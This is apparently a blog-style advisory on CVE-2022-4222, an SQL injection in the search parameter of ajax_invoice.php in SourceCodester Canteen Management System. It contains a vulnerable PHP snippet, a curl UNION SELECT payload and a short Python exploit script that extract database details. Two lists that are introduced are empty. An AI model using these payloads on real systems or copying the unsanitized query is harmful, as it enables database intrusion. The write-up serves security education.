In late 2022, a serious vulnerability was discovered in the popular SourceCodester Canteen Management System, a PHP/MySQL-based web application used in many small business environments. This bug, tracked as CVE-2022-4222 and also referenced as VDB-214523, received a critical rating because it allows attackers to exploit the application remotely and potentially compromise the underlying database.
The issue lies in poor input validation within the ajax_invoice.php file’s handling of POST requests, specifically in the search argument. With little effort, a malicious actor can execute arbitrary SQL commands—classic SQL Injection.
Where is the bug?
The core of the problem is in how ajax_invoice.php processes the search POST parameter. The application takes whatever is sent in via POST, plugs it directly into an SQL query, and runs it with no sanitization or validation.
Component: POST Request Handler
File: ajax_invoice.php
Function: query
Input: search argument (POST)
Type: SQL Injection (SQLi)
Remote? Yes, remote exploitation is possible.
Why is this critical?
SQL Injection is one of the most dangerous types of web vulnerabilities. A successful attack could allow someone to:
Code Analysis
Let’s look at how this might happen in practice. Here's a simplified snippet inspired by the vulnerable code in ajax_invoice.php:
<?php
// ajax_invoice.php
include 'db_config.php';
if (isset($_POST['search'])) {
$search = $_POST['search'];
$sql = "SELECT * FROM invoices WHERE invoice_number LIKE '%$search%'";
$result = $conn->query($sql);
// Output results...
}
?>
> What’s wrong here?
>
> The application takes the search input and drops it unfiltered into the SQL string, which is then executed. If someone sends search=123' OR 1=1 -- as input, the SQL ends up like this:
>
>
> SELECT * FROM invoices WHERE invoice_number LIKE '%123' OR 1=1 -- %'
> >
> This effectively ignores the real search and returns all invoices. With more complex payloads, an attacker could do much more.
Request
curl -X POST http://localhost/canteen/ajax_invoice.php -d "search=123' UNION SELECT 1,2,user(),database(),5 -- -"
The attacker’s crafted query returns the database user and name instead of invoice data.
Result: Attackers get sensitive database info—they can escalate from there.
Here's a simple Python exploit to demonstrate automated exploitation
import requests
url = 'http://target-site/canteen/ajax_invoice.php';
payload = "' UNION SELECT 1,2,user(),database(),5 -- -"
data = {
"search": payload
}
response = requests.post(url, data=data)
print(response.text)
This script shows how trivially someone can extract information—no authentication required.
Use Prepared Statements
Don’t insert user input directly into SQL. Use prepared statements or parameterized queries instead:
Reference Links
- Original Advisory at VulDB (VDB-214523)
- NVD CVE-2022-4222 Record
- SourceCodester Project on SourceForge
- OWASP SQL Injection Cheat Sheet
Conclusion
CVE-2022-4222 is a textbook example of how dangerous poor input handling can be. If you run SourceCodester Canteen Management System, update it immediately and sanitize all inputs! Attackers can and do target these easy wins—protect your data before they find you.
Stay safe, update your code, and always validate your inputs!
*This post was created exclusively for educational purposes. Please use this knowledge responsibly and only on systems you own or have explicit permission to test.*
Timeline
Published on: 11/30/2022 07:15:00 UTC
Last modified on: 12/01/2022 23:41:00 UTC